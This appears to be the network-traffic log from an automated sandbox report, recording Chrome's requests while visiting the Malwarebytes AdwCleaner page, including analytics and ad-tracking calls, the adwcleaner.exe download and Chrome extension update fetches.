                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a7829af1c8d-AMS
                                                                                                                                                                      content-encoding: br
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.46.212.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /munchkin.js HTTP/1.1
                                                                                                                                                                      Host: munchkin.marketo.net
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                      ETag: "92b41a298690c047b0c4602dd843cba4:1662686319.691662"
                                                                                                                                                                      Last-Modified: Fri, 09 Sep 2022 01:18:39 GMT
                                                                                                                                                                      Server: AkamaiNetStorage
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      Content-Length: 728
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      P3P: policyref="http://www.marketo.com/w3c/p3p.xml", CP="NOI DSP COR NID CURi OUR NOR"
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://munchkin.marketo.net/162/munchkin.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.46.212.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /162/munchkin.js HTTP/1.1
                                                                                                                                                                      Host: munchkin.marketo.net
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                      ETag: "75daf56f6191efe42577301908659c29:1656637152.894482"
                                                                                                                                                                      Last-Modified: Fri, 01 Jul 2022 00:59:12 GMT
                                                                                                                                                                      Server: AkamaiNetStorage
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Cache-Control: max-age=8640000
                                                                                                                                                                      Expires: Wed, 19 Apr 2023 12:49:05 GMT
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      Content-Length: 4677
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      P3P: policyref="http://www.marketo.com/w3c/p3p.xml", CP="NOI DSP COR NID CURi OUR NOR"
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.142:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer HTTP/2.0
                                                                                                                                                                      host: analytics.google.com
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: 1P_JAR=2023-01-09-12
                                                                                                                                                                      cookie: NID=511=HBMbtXOMP9VDBN7g3ldDYsEVs_PIHgBuMTHG1uLIX2HhpmuxAsHkYrzHtkxt4IK9mLs7B-MY7SYbJ330XCFKx_CsXMhjWYGZuDphZPfIMlchww7MM_J7gx-ZriK_VxNGnmV5deeuDvXyaO-1AFhsho4wwdNUgjfVn5EvemsBPRg
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.244.42.5:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29 HTTP/2.0
                                                                                                                                                                      host: t.co
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      perf: 7626143928
                                                                                                                                                                      server: tsa_o
                                                                                                                                                                      set-cookie: muc_ads=551bffa6-e67e-46b7-929c-6426e5ee547b; Max-Age=63072000; Expires=Wed, 08 Jan 2025 12:49:05 GMT; Path=/; Domain=t.co; Secure; SameSite=None
                                                                                                                                                                      content-type: image/gif;charset=utf-8
                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                      content-length: 43
                                                                                                                                                                      x-transaction-id: cbf306ea58ec92b3
                                                                                                                                                                      strict-transport-security: max-age=0
                                                                                                                                                                      x-response-time: 102
                                                                                                                                                                      x-connection-hash: 3b01fb4ace1bf26bc21355b99d0bb1d568ada8652b822aed4f9fcd8f7d36f3cd
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.244.42.67:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29 HTTP/2.0
                                                                                                                                                                      host: analytics.twitter.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      perf: 7626143928
                                                                                                                                                                      server: tsa_o
                                                                                                                                                                      set-cookie: personalization_id="v1_7qsNMFCjluXlJsaXP/DdxA=="; Max-Age=63072000; Expires=Wed, 08 Jan 2025 12:49:05 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                                      content-type: image/gif;charset=utf-8
                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                      content-length: 43
                                                                                                                                                                      x-transaction-id: 1e106670c6c14e1b
                                                                                                                                                                      strict-transport-security: max-age=631138519
                                                                                                                                                                      x-response-time: 104
                                                                                                                                                                      x-connection-hash: e716377b5ab86099ef31213139a173ea4fe2131bcbaceb66325e1217cf81d753
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.27.154:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1 HTTP/2.0
                                                                                                                                                                      host: stats.g.doubleclick.net
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://privacyportal.onetrust.com/request/v1/consentreceipts
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.18.27.85:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /request/v1/consentreceipts HTTP/2.0
                                                                                                                                                                      host: privacyportal.onetrust.com
                                                                                                                                                                      content-length: 7878
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 201
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:06 GMT
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      vary: Origin
                                                                                                                                                                      vary: Access-Control-Request-Method
                                                                                                                                                                      vary: Access-Control-Request-Headers
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a7be839b8dc-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://adwcleaner.malwarebytes.com/adwcleaner?channel=release
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      108.156.60.54:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /adwcleaner?channel=release HTTP/2.0
                                                                                                                                                                      host: adwcleaner.malwarebytes.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: same-site
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/octet-stream
                                                                                                                                                                      content-length: 8791352
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: s-maxage=604800
                                                                                                                                                                      content-disposition: attachment;filename="adwcleaner.exe"
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:06 GMT
                                                                                                                                                                      etag: "9b3f3f12aabd7e12c03d1864445aee56-2"
                                                                                                                                                                      expect-ct: enforce; max-age=3600
                                                                                                                                                                      last-modified: Fri, 16 Sep 2022 17:05:32 GMT
                                                                                                                                                                      permissions-policy: interest-cohort=()
                                                                                                                                                                      referrer-policy: strict-origin
                                                                                                                                                                      strict-transport-security: max-age=31560000;includeSubDomains;
                                                                                                                                                                      x-amz-version-id: 1663347932693635
                                                                                                                                                                      x-content-sha256: 1f544da66675521a649e632108f86afb351ad336bd34b7b5c3d290827ebeef54
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-download-options: noopen
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-permitted-cross-domain-policies: none
                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 cf8597852fd073f5b8e6fed4908fe46e.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-P2
                                                                                                                                                                      x-amz-cf-id: tRH33O7H_TOq_FoxS9mQ04qHh17gn_BunvZfnlmCsCQFFIgoZKcqvQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.168.194:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/2.0
                                                                                                                                                                      host: googleads.g.doubleclick.net
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.29:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /partner/2594100/domain/malwarebytes.com/token HTTP/2.0
                                                                                                                                                                      host: cdn.linkedin.oribi.io
                                                                                                                                                                      accept: *
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      date: Mon, 09 Jan 2023 11:57:04 GMT
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: public, max-age=3600
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 d143bdfb7cce4cf7ec0bcf9ec13e5914.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: KU9GhP9a9IbelLZ07P4bHbR8ydnq62hLuROvXo-eu1q4ZfioBg1M9A==
                                                                                                                                                                      age: 3121
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.163:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c HTTP/2.0
                                                                                                                                                                      host: update.googleapis.com
                                                                                                                                                                      content-length: 3017
                                                                                                                                                                      x-goog-update-appid: hnimpnehoodheedghdeeijklkeaacbdc,eeigpngbgcognadeebkilcpcaedhellh,llkgjffcdpffmhiakmfcdcblohccpfmo,aemomkdncapdnfajjbbcbdebjljbpmpj,cmahhnpholdijhjokonmfdjbfmklppij,giekcmmlnklenlaomppkphknjmnnpneh,khaoiebndkojlmppeemjhbpbandiljpe,ehgidpndbllacpjalkiimkbadgjfnnmc,ihnlcenocehgdaegdmhbidjhnhdchfmm,obedbbhbpmojnkanicioggnmelmoomoc,jamhcnnkihinmdlkakkaopbjbbcngflc,jflookgnkcckhobaglndicnbbgbonegd,gkmgaooipdjhmangpemjhigmamcehddo,ojhpjlocmbogdgmfpkhlaaeamibhnphh,ggkkehgbnfjpeggfpleeakpidbkibbmn,bklopemakmnopmghhmccadeonafabnal,oimompecagnajdejgnnjijobebaeigek,gcmjkmgdlgnkkcocmoeiminaijmmjnii,hfnkpimlhhgieaddgfemjhofmfblmnib
                                                                                                                                                                      x-goog-update-interactivity: bg
                                                                                                                                                                      x-goog-update-updater: chrome-89.0.4389.114
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.104.35.123
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      HEAD
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      HEAD /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 6760942
                                                                                                                                                                      x-request-id: f50aba80-3510-4e6c-9cbd-872da05d695e
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44513
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=0-1119
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 1120
                                                                                                                                                                      x-request-id: 3aca1a54-1d7e-41e6-8925-b1f50be47cab
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44513
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 0-1119/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=1120-2811
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 1692
                                                                                                                                                                      x-request-id: 78b0f29c-a6ec-4d9b-9d99-50f2a44e88b7
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44517
